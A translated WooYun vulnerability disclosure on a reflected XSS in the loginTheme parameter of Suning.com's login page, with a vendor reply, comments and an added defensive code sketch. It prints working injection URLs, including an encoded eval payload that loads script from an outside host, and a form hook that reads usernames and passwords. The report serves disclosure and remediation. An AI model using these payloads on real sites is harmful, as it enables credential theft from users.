
Vulnerability summary

Defect ID: wooyun-2014-053383

Title: XSS vulnerability on a Suning.com subsite can be used to obtain account passwords (XSS form-hijacking trick)

Related vendor: 江苏苏宁易购电子商务有限公司 (Jiangsu Suning.com E-Commerce Co., Ltd.)

Author: 龟兔赛跑

Submitted: 2014-03-11 23:11

Fix deadline: 2014-04-25 23:12

Public disclosure: 2014-04-25 23:12

Vulnerability type: XSS (cross-site scripting)

Severity: Low

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-03-11: Details sent to the vendor, awaiting vendor action
2014-03-12: Vendor confirmed; details visible to the vendor only
2014-03-22: Details opened to core white hats and relevant domain experts
2014-04-01: Details opened to regular white hats
2014-04-11: Details opened to intern white hats
2014-04-25: Details opened to the public

Brief description:

A reflected XSS vulnerability on a Suning.com subsite can be used to obtain account passwords.

Detailed description:

The Suning.com login page has a reflected XSS vulnerability. The affected URL is:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c
The loginTheme parameter is filtered to some extent, but HTML tags such as <a> and <img> are still allowed through.
The simplest test is:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Cimg%20src=%22test
An image then appears on the member login box:

[Screenshot: suning2.png]


The next step is building injected code that loads a JS file, and bypassing the browser's XSS filter. So far I have only managed to load JS in Firefox; it has not worked in IE or Chrome yet, but I'm sure the experts here can find a way.
The JS code that gets loaded is:

$("form").submit(function( event ) {
alert($("input[name='username']").val() + '=' + $("input[name='password']").val());
});


The URL visited in Firefox is built with javascript:eval + String.fromCharCode:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Ca%20href%3D%22javascript%3Aeval%28String.fromCharCode%2895,108,111,97,100,74,115,40,34,104,116,116,112,115,58,47,47,111,119,97,102,112,101,46,115,105,110,97,97,112,112,46,99,111,109,47,115,116,97,116,105,99,47,116,101,115,116,46,106,115,34,41%29%29;%22%20id=%22a
Here an <a> is injected; when the user clicks into the input box the JS is loaded, and on submit the username and password are captured.
I don't need to explain how to exploit this, do I?

Proof of vulnerability:

[Screenshot: suning.png]

Suggested fix:

Filter the loginTheme parameter.
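As an added example (not code from this report, nor Suning's own server code, which the page does not show), the reflection described above modelled in JavaScript: a blocklist-style filter that lets the report's test value `b2c"><img src="test` break out of the attribute, next to a hardened rendering that escapes attribute characters and accepts only known theme names. The template, the filter and the theme list are assumptions.

```javascript
// Added example: models how loginTheme might be reflected into a quoted HTML
// attribute and why "some filtering" is not enough. Template, blocklist and
// theme list are assumptions; the real server-side code is not on the page.
const ALLOWED_THEMES = new Set(["b2c"]); // assumed list of valid theme names

// Vulnerable rendering: a blocklist that strips <script> but leaves every
// other tag, so a value ending the attribute with `">` injects a new element.
function renderVulnerable(loginTheme) {
  const filtered = loginTheme.replace(/<\/?script[^>]*>/gi, "");
  return `<input type="hidden" name="loginTheme" value="${filtered}">`;
}

// Hardened step 1: escape every character that can close the attribute or
// open a tag, so the value can never leave the attribute context.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened step 2: loginTheme selects a theme, so an allowlist is the right
// check; unknown values fall back to the default theme and are still escaped.
function renderHardened(loginTheme) {
  const theme = ALLOWED_THEMES.has(loginTheme) ? loginTheme : "b2c";
  return `<input type="hidden" name="loginTheme" value="${escapeAttr(theme)}">`;
}

// Check helper: number of '<' beyond the template's own single tag, i.e. how
// many elements the attacker-controlled value managed to inject.
function injectedTagCount(html) {
  return (html.match(/</g) || []).length - 1;
}

// The report's simplest test value (constructed here from the page's URL).
const PAYLOAD = 'b2c"><img src="test';
```

Running `injectedTagCount(renderVulnerable(PAYLOAD))` reports one injected element, while the hardened renderer reports none.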

Copyright notice: please credit 龟兔赛跑@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-03-12 09:00

Vendor reply:

Thank you for your attention to Suning.com's security. We will confirm it first and then arrange a fix. Thanks.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-03-12 00:04 | zzR, certified white hat ( core white hat | Rank:1382 vulnerabilities:122 | buying WB at 1:5, unlimited [platform escrow])

    Yamete

  2. 2014-03-12 00:16 | Mr.leo ( regular white hat | Rank:1314 vulnerabilities:176 | Say something!!)

    Yamete

  3. 2014-03-12 14:02 | char ( passer-by | Rank:13 vulnerabilities:3 | Ping An, more than just insurance.)

    Itai itai yo~

  4. 2014-05-09 16:41 | bitcoin ( regular white hat | Rank:715 vulnerabilities:218 | Learning is the best investment!)

    Awesome!

  5. 2014-10-27 10:43 | px1624 ( regular white hat | Rank:1036 vulnerabilities:175 | px1624)

    ...Damn, a reflected XSS can get 15 points?

  6. 2014-10-28 17:49 | quanxian ( intern white hat | Rank:32 vulnerabilities:2 | This is QuanXian.)

    @px1624 The key is the location.

  7. 2014-10-28 17:56 | px1624 ( regular white hat | Rank:1036 vulnerabilities:175 | px1624)

    @quanxian How is the location good? Any reflected XSS can achieve this effect.